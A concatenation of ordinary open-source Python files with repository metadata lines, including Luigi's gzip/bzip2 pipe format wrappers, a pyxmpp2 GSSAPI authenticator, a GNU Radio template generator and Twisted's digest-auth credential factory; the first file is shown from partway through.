lexer is the lexer used to analyze the source. it points the start token of source.
filename is the filename analyzed.
dirname is the file directory.
"""
self.fileStartRules.append(fileStartRule)
def AddProjectRules(self, projectRule):
"""
Add rule on the project
Added Rule should be function with following prototype "def RunRule(targetName)"
targetName is the analysis target directory.
"""
self.projectRules.append(projectRule)
class RollbackImporter:
def __init__(self):
"Creates an instance and installs as the global importer"
self.previousModules = sys.modules.copy()
self.realImport = __builtins__["__import__"]
__builtins__["__import__"] = self._import
self.newModules = {}
def _import(self, name, globals=None, locals=None, fromlist=[]):
result = apply(self.realImport, (name, globals, locals, fromlist))
if name.find("rules") != -1 :
self.newModules[name] = 1
return result
def uninstall(self):
for modname in self.newModules.keys():
if modname.find("rules") != -1 :
if not self.previousModules.has_key(modname):
# Force reload when modname next imported
del(sys.modules[modname])
__builtins__["__import__"] = self.realImport
ruleManager = RuleManager(GetRuntimePath())
| gleicher27/Tardigrade | moose/framework/contrib/nsiqcppstyle/nsiqcppstyle_rulemanager.py | Python | lgpl-2.1 | 10,691 |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import signal
import subprocess
import io
import os
import re
import locale
import tempfile
import warnings
from luigi import six
class FileWrapper(object):
"""
Wrap `file` in a "real" so stuff can be added to it after creation.
"""
def __init__(self, file_object):
self._subpipe = file_object
def __getattr__(self, name):
# forward calls to 'write', 'close' and other methods not defined below
return getattr(self._subpipe, name)
def __enter__(self, *args, **kwargs):
# instead of returning whatever is returned by __enter__ on the subpipe
# this returns self, so whatever custom injected methods are still available
# this might cause problems with custom file_objects, but seems to work
# fine with standard python `file` objects which is the only default use
return self
def __exit__(self, *args, **kwargs):
return self._subpipe.__exit__(*args, **kwargs)
def __iter__(self):
return iter(self._subpipe)
class InputPipeProcessWrapper(object):
def __init__(self, command, input_pipe=None):
"""
Initializes a InputPipeProcessWrapper instance.
:param command: a subprocess.Popen instance with stdin=input_pipe and
stdout=subprocess.PIPE.
Alternatively, just its args argument as a convenience.
"""
self._command = command
self._input_pipe = input_pipe
self._original_input = True
if input_pipe is not None:
try:
input_pipe.fileno()
except AttributeError:
# subprocess require a fileno to work, if not present we copy to disk first
self._original_input = False
f = tempfile.NamedTemporaryFile('wb', prefix='luigi-process_tmp', delete=False)
self._tmp_file = f.name
f.write(input_pipe.read())
input_pipe.close()
f.close()
self._input_pipe = FileWrapper(io.BufferedReader(io.FileIO(self._tmp_file, 'r')))
self._process = command if isinstance(command, subprocess.Popen) else self.create_subprocess(command)
# we want to keep a circular reference to avoid garbage collection
# when the object is used in, e.g., pipe.read()
self._process._selfref = self
def create_subprocess(self, command):
"""
http://www.chiark.greenend.org.uk/ucgi/~cjwatson/blosxom/2009-07-02-python-sigpipe.html
"""
def subprocess_setup():
# Python installs a SIGPIPE handler by default. This is usually not what
# non-Python subprocesses expect.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
return subprocess.Popen(command,
stdin=self._input_pipe,
stdout=subprocess.PIPE,
preexec_fn=subprocess_setup,
close_fds=True)
def _finish(self):
# Need to close this before input_pipe to get all SIGPIPE messages correctly
self._process.stdout.close()
if not self._original_input and os.path.exists(self._tmp_file):
os.remove(self._tmp_file)
if self._input_pipe is not None:
self._input_pipe.close()
self._process.wait() # deadlock?
if self._process.returncode not in (0, 141, 128 - 141):
# 141 == 128 + 13 == 128 + SIGPIPE - normally processes exit with 128 + {reiceived SIG}
# 128 - 141 == -13 == -SIGPIPE, sometimes python receives -13 for some subprocesses
raise RuntimeError('Error reading from pipe. Subcommand exited with non-zero exit status %s.' % self._process.returncode)
def close(self):
self._finish()
def __del__(self):
self._finish()
def __enter__(self):
return self
def _abort(self):
"""
Call _finish, but eat the exception (if any).
"""
try:
self._finish()
except KeyboardInterrupt:
raise
except BaseException:
pass
def __exit__(self, type, value, traceback):
if type:
self._abort()
else:
self._finish()
def __getattr__(self, name):
if name == '_process':
raise AttributeError(name)
try:
return getattr(self._process.stdout, name)
except AttributeError:
return getattr(self._input_pipe, name)
def __iter__(self):
for line in self._process.stdout:
yield line
self._finish()
def readable(self):
return True
def writable(self):
return False
def seekable(self):
return False
class OutputPipeProcessWrapper(object):
WRITES_BEFORE_FLUSH = 10000
def __init__(self, command, output_pipe=None):
self.closed = False
self._command = command
self._output_pipe = output_pipe
self._process = subprocess.Popen(command,
stdin=subprocess.PIPE,
stdout=output_pipe,
close_fds=True)
self._flushcount = 0
def write(self, *args, **kwargs):
self._process.stdin.write(*args, **kwargs)
self._flushcount += 1
if self._flushcount == self.WRITES_BEFORE_FLUSH:
self._process.stdin.flush()
self._flushcount = 0
def writeLine(self, line):
assert '\n' not in line
self.write(line + '\n')
def _finish(self):
"""
Closes and waits for subprocess to exit.
"""
if self._process.returncode is None:
self._process.stdin.flush()
self._process.stdin.close()
self._process.wait()
self.closed = True
def __del__(self):
if not self.closed:
self.abort()
def __exit__(self, type, value, traceback):
if type is None:
self.close()
else:
self.abort()
def __enter__(self):
return self
def close(self):
self._finish()
if self._process.returncode == 0:
if self._output_pipe is not None:
self._output_pipe.close()
else:
raise RuntimeError('Error when executing command %s' % self._command)
def abort(self):
self._finish()
def __getattr__(self, name):
if name == '_process':
raise AttributeError(name)
try:
return getattr(self._process.stdin, name)
except AttributeError:
return getattr(self._output_pipe, name)
def readable(self):
return False
def writable(self):
return True
def seekable(self):
return False
class BaseWrapper(object):
def __init__(self, stream, *args, **kwargs):
self._stream = stream
try:
super(BaseWrapper, self).__init__(stream, *args, **kwargs)
except TypeError:
pass
def __getattr__(self, name):
if name == '_stream':
raise AttributeError(name)
return getattr(self._stream, name)
def __enter__(self):
self._stream.__enter__()
return self
def __exit__(self, *args):
self._stream.__exit__(*args)
def __iter__(self):
try:
for line in self._stream:
yield line
finally:
self.close()
class NewlineWrapper(BaseWrapper):
def __init__(self, stream, newline=None):
if newline is None:
self.newline = newline
else:
self.newline = newline.encode('ascii')
if self.newline not in (b'', b'\r\n', b'\n', b'\r', None):
raise ValueError("newline need to be one of {b'', b'\r\n', b'\n', b'\r', None}")
super(NewlineWrapper, self).__init__(stream)
def read(self, n=-1):
b = self._stream.read(n)
if self.newline == b'':
return b
if self.newline is None:
newline = b'\n'
return re.sub(b'(\n|\r\n|\r)', newline, b)
def writelines(self, lines):
if self.newline is None or self.newline == '':
newline = os.linesep.encode('ascii')
else:
newline = self.newline
self._stream.writelines(
(re.sub(b'(\n|\r\n|\r)', newline, line) for line in lines)
)
def write(self, b):
if self.newline is None or self.newline == '':
newline = os.linesep.encode('ascii')
else:
newline = self.newline
self._stream.write(re.sub(b'(\n|\r\n|\r)', newline, b))
class MixedUnicodeBytesWrapper(BaseWrapper):
"""
"""
def __init__(self, stream, encoding=None):
if encoding is None:
encoding = locale.getpreferredencoding()
self.encoding = encoding
super(MixedUnicodeBytesWrapper, self).__init__(stream)
def write(self, b):
self._stream.write(self._convert(b))
def writelines(self, lines):
self._stream.writelines((self._convert(line) for line in lines))
def _convert(self, b):
if isinstance(b, six.text_type):
b = b.encode(self.encoding)
warnings.warn('Writing unicode to byte stream', stacklevel=2)
return b
class Format(object):
"""
Interface for format specifications.
"""
@classmethod
def pipe_reader(cls, input_pipe):
raise NotImplementedError()
@classmethod
def pipe_writer(cls, output_pipe):
raise NotImplementedError()
def __rshift__(a, b):
return ChainFormat(a, b)
class ChainFormat(Format):
def __init__(self, *args, **kwargs):
self.args = args
try:
self.input = args[0].input
except AttributeError:
pass
try:
self.output = args[-1].output
except AttributeError:
pass
if not kwargs.get('check_consistency', True):
return
for x in range(len(args) - 1):
try:
if args[x].output != args[x + 1].input:
raise TypeError(
'The format chaining is not valid, %s expect %s'
'but %s provide %s' % (
args[x].__class__.__name__,
args[x].input,
args[x + 1].__class__.__name__,
args[x + 1].output,
)
)
except AttributeError:
pass
def pipe_reader(self, input_pipe):
for x in reversed(self.args):
input_pipe = x.pipe_reader(input_pipe)
return input_pipe
def pipe_writer(self, output_pipe):
for x in reversed(self.args):
output_pipe = x.pipe_writer(output_pipe)
return output_pipe
class TextWrapper(io.TextIOWrapper):
def __exit__(self, *args):
# io.TextIOWrapper close the file on __exit__, let the underlying file decide
if not self.closed and self.writable():
super(TextWrapper, self).flush()
self._stream.__exit__(*args)
def __del__(self, *args):
# io.TextIOWrapper close the file on __del__, let the underlying file decide
if not self.closed and self.writable():
super(TextWrapper, self).flush()
try:
self._stream.__del__(*args)
except AttributeError:
pass
def __init__(self, stream, *args, **kwargs):
self._stream = stream
try:
super(TextWrapper, self).__init__(stream, *args, **kwargs)
except TypeError:
pass
def __getattr__(self, name):
if name == '_stream':
raise AttributeError(name)
return getattr(self._stream, name)
def __enter__(self):
self._stream.__enter__()
return self
class NopFormat(Format):
def pipe_reader(self, input_pipe):
return input_pipe
def pipe_writer(self, output_pipe):
return output_pipe
class WrappedFormat(Format):
def __init__(self, *args, **kwargs):
self.args = args
self.kwargs = kwargs
def pipe_reader(self, input_pipe):
return self.wrapper_cls(input_pipe, *self.args, **self.kwargs)
def pipe_writer(self, output_pipe):
return self.wrapper_cls(output_pipe, *self.args, **self.kwargs)
class TextFormat(WrappedFormat):
input = 'unicode'
output = 'bytes'
wrapper_cls = TextWrapper
class MixedUnicodeBytesFormat(WrappedFormat):
output = 'bytes'
wrapper_cls = MixedUnicodeBytesWrapper
class NewlineFormat(WrappedFormat):
input = 'bytes'
output = 'bytes'
wrapper_cls = NewlineWrapper
class GzipFormat(Format):
input = 'bytes'
output = 'bytes'
def __init__(self, compression_level=None):
self.compression_level = compression_level
def pipe_reader(self, input_pipe):
return InputPipeProcessWrapper(['gunzip'], input_pipe)
def pipe_writer(self, output_pipe):
args = ['gzip']
if self.compression_level is not None:
args.append('-' + str(int(self.compression_level)))
return OutputPipeProcessWrapper(args, output_pipe)
class Bzip2Format(Format):
input = 'bytes'
output = 'bytes'
def pipe_reader(self, input_pipe):
return InputPipeProcessWrapper(['bzcat'], input_pipe)
def pipe_writer(self, output_pipe):
return OutputPipeProcessWrapper(['bzip2'], output_pipe)
Text = TextFormat()
UTF8 = TextFormat(encoding='utf8')
Nop = NopFormat()
SysNewLine = NewlineFormat()
Gzip = GzipFormat()
Bzip2 = Bzip2Format()
MixedUnicodeBytes = MixedUnicodeBytesFormat()
def get_default_format():
if six.PY3:
return Text
elif os.linesep == '\n':
return Nop
else:
return SysNewLine
| ViaSat/luigi | luigi/format.py | Python | apache-2.0 | 14,652 |
#
# (C) Copyright 2008 Jelmer Vernooij <[email protected]>
# (C) Copyright 2011 Jacek Konieczny <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License Version
# 2.1 as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
"""GSSAPI authentication mechanism for PyXMPP SASL implementation.
Normative reference:
- `RFC 4752 <http://www.ietf.org/rfc/rfc4752.txt>`__
"""
__docformat__ = "restructuredtext en"
import base64
import kerberos
import logging
from .core import ClientAuthenticator, Response, Success
from .core import sasl_mechanism
logger = logging.getLogger("pyxmpp2.sasl.gssapi")
@sasl_mechanism("GSSAPI", 75)
class GSSAPIClientAuthenticator(ClientAuthenticator):
"""Provides client-side GSSAPI SASL (Kerberos 5) authentication."""
def __init__(self, password_manager):
ClientAuthenticator.__init__(self, password_manager)
self.password_manager = password_manager
self.username = None
self._gss = None
self.step = None
self.authzid = None
def start(self, username, authzid):
self.username = username
self.authzid = authzid
_unused, self._gss = kerberos.authGSSClientInit(authzid or
"{0}@{1}".format("xmpp",
self.password_manager.get_serv_host()))
self.step = 0
return self.challenge("")
def challenge(self, challenge):
if self.step == 0:
ret = kerberos.authGSSClientStep(self._gss,
base64.b64encode(challenge))
if ret != kerberos.AUTH_GSS_CONTINUE:
self.step = 1
elif self.step == 1:
ret = kerberos.authGSSClientUnwrap(self._gss,
base64.b64encode(challenge))
response = kerberos.authGSSClientResponse(self._gss)
ret = kerberos.authGSSClientWrap(self._gss, response, self.username)
response = kerberos.authGSSClientResponse(self._gss)
if response is None:
return Response("")
else:
return Response(base64.b64decode(response))
def finish(self, data):
self.username = kerberos.authGSSClientUserName(self._gss)
logger.debug("Authenticated as {0!r}".format(
kerberos.authGSSClientUserName(self._gss)))
return Success(self.username, None, self.authzid)
# vi: sts=4 et sw=4
| pforret/python-for-android | python3-alpha/python-libs/pyxmpp2/sasl/gssapi.py | Python | apache-2.0 | 3,008 |
"""
Some scripts define objects that we want to import via yaml files
that we pass to the script, so this directory must be a python
module, rather than just a directory full of scripts.
"""
| fyffyt/pylearn2 | pylearn2/scripts/__init__.py | Python | bsd-3-clause | 191 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Invoicing Journals',
'version': '1.0',
'category': 'Sales Management',
'description': """
The sales journal modules allows you to categorise your sales and deliveries (picking lists) between different journals.
========================================================================================================================
This module is very helpful for bigger companies that works by departments.
You can use journal for different purposes, some examples:
----------------------------------------------------------
* isolate sales of different departments
* journals for deliveries by truck or by UPS
Journals have a responsible and evolves between different status:
-----------------------------------------------------------------
* draft, open, cancel, done.
Batch operations can be processed on the different journals to confirm all sales
at once, to validate or invoice packing.
It also supports batch invoicing methods that can be configured by partners and sales orders, examples:
-------------------------------------------------------------------------------------------------------
* daily invoicing
* monthly invoicing
Some statistics by journals are provided.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/billing',
'images': ['images/invoice_type.jpeg'],
'depends': ['sale_stock'],
'data': [
'security/ir.model.access.csv',
'sale_journal_view.xml',
'sale_journal_data.xml'
],
'demo': ['sale_journal_demo.xml'],
'test': [ ],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| diogocs1/comps | web/addons/sale_journal/__openerp__.py | Python | apache-2.0 | 2,681 |
#
# Copyright 2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
""" A code generator (needed by ModToolAdd) """
from templates import Templates
import Cheetah.Template
from util_functions import str_to_fancyc_comment
from util_functions import str_to_python_comment
from util_functions import strip_default_values
from util_functions import strip_arg_types
from util_functions import strip_arg_types_grc
class GRMTemplate(Cheetah.Template.Template):
""" An extended template class """
def __init__(self, src, searchList):
self.grtypelist = {
'sync': 'sync_block',
'sink': 'sync_block',
'source': 'sync_block',
'decimator': 'sync_decimator',
'interpolator': 'sync_interpolator',
'general': 'block',
'tagged_stream': 'tagged_stream_block',
'hier': 'hier_block2',
'noblock': ''}
searchList['str_to_fancyc_comment'] = str_to_fancyc_comment
searchList['str_to_python_comment'] = str_to_python_comment
searchList['strip_default_values'] = strip_default_values
searchList['strip_arg_types'] = strip_arg_types
searchList['strip_arg_types_grc'] = strip_arg_types_grc
Cheetah.Template.Template.__init__(self, src, searchList=searchList)
self.grblocktype = self.grtypelist[searchList['blocktype']]
if searchList['is_component']:
self.include_dir_prefix = "gnuradio/" + searchList['modname']
else:
self.include_dir_prefix = searchList['modname']
def get_template(tpl_id, **kwargs):
""" Return the template given by tpl_id, parsed through Cheetah """
return str(GRMTemplate(Templates[tpl_id], searchList=kwargs))
| riveridea/gnuradio | gr-utils/python/modtool/code_generator.py | Python | gpl-3.0 | 2,485 |
# -*- test-case-name: twisted.web.test.test_httpauth -*-
# Copyright (c) 2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Implementation of RFC2617: HTTP Digest Authentication
@see: U{http://www.faqs.org/rfcs/rfc2617.html}
"""
from zope.interface import implements
from twisted.cred import credentials
from twisted.web.iweb import ICredentialFactory
class DigestCredentialFactory(object):
"""
Wrapper for L{digest.DigestCredentialFactory} that implements the
L{ICredentialFactory} interface.
"""
implements(ICredentialFactory)
scheme = 'digest'
def __init__(self, algorithm, authenticationRealm):
"""
Create the digest credential factory that this object wraps.
"""
self.digest = credentials.DigestCredentialFactory(algorithm,
authenticationRealm)
def getChallenge(self, request):
"""
Generate the challenge for use in the WWW-Authenticate header
@param request: The L{IRequest} to with access was denied and for the
response to which this challenge is being generated.
@return: The C{dict} that can be used to generate a WWW-Authenticate
header.
"""
return self.digest.getChallenge(request.getClientIP())
def decode(self, response, request):
"""
Create a L{twisted.cred.digest.DigestedCredentials} object from the
given response and request.
@see: L{ICredentialFactory.decode}
"""
return self.digest.decode(response,
request.method,
request.getClientIP())
| jxta/cc | vendor/Twisted-10.0.0/twisted/web/_auth/digest.py | Python | apache-2.0 | 1,700 |
Subsets and Splits